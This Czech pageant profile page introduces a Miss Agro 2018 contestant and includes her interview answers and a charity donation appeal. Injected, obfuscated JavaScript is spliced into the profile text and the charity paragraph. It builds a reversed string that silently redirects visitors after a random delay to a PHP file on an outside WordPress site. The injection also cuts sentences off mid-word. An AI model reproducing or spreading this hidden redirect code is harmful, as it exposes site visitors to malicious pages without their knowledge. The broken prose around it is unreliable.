Nikola Ľuptačiková

Profil

Fakulta: PEF
Obor: Veřejná správa a regionální rozvoj (VSRR)
Ročník: 1.
Věk:
20

Nikola je ukecaná, věčně usměvavá vesnická holka, která je pro každou srdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andu. Ze všeho nejvíc miluje svou rodinu a přátele. Ve svém volném čase ráda peče, vaří, chodí na procházky se svými psy, sportuje, ale také ráda zajde na dobrou party s přáteli. Nikola miluje dobré jídlo, víno a zábavu. Nemá ráda negativní a nepřející lidi a řídí se dvěma životními motty: „Láska prochází žaludkem.“ a „Každý svého štěstí strůjcem.“

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2018?

Miss Agro 2018 by neměla být jen krásná dívka, ale také dívka se srdcem na správném místě. A mohu o sobě říci, že se pro druhé dokážu roztrhat a ráda pomáhám těm, kteří to potřebují. Dále si o sobě myslím, že jsem velmi přátelská, milá, věčně usměvavá, nepohrdám lidmi a uznávám autority.

Kdyby ses mohla narodit ještě jednou, kým bys chtěla být?

Kdybych se měla narodit ještě jednou, tak doufám v to, že těm samým úžasným rodičům, do té samé rodiny, a že během života poznám ty samé skvělé přátele jako mám teď. Na svém životě bych neměnila absolutně nic. Mé motto zní: „Každý svého štěstí strůjcem“, a proto nikomu nezávidím jejich životy a jsem spokojená s tím co mám.

Proč sis vybrala zrovna studium na ČZU a co máš na ní nejraději?

ČZU, jak já říkám tzv. „ghetto“, je univerzita s úžasným prostředím. Po mém předchozím studiu na FJFI, která byla uprostřed Prahy ve staré budově, a studenti mezi sebou moc nekomunikovali, jsem se zamilovala do této univerzity. Jsou zde nádherné zahrady, které jsou ideálním prostředím pro učení. Zároveň se mi moc líbí, že všechny fakulty, menza, restaurace, koleje jsou v jednom areálu, proto ten název „ghetto“. A největší plus jsou zde studenti, poznala jsem zde mnoho skvělých přátel.

Přihlásila ses do Miss Agro sama nebo Tě přihlásil někdo jiný?

Do této soutěže jsem se přihlásila sama, na popud své maminky a známých. Asi největší strach jsem měla z mluvení do mikrofonu před lidmi, sice jsem ukecaný člověk, ale formální mluva před lidmi mi moc nejde a také jsem velký trémista.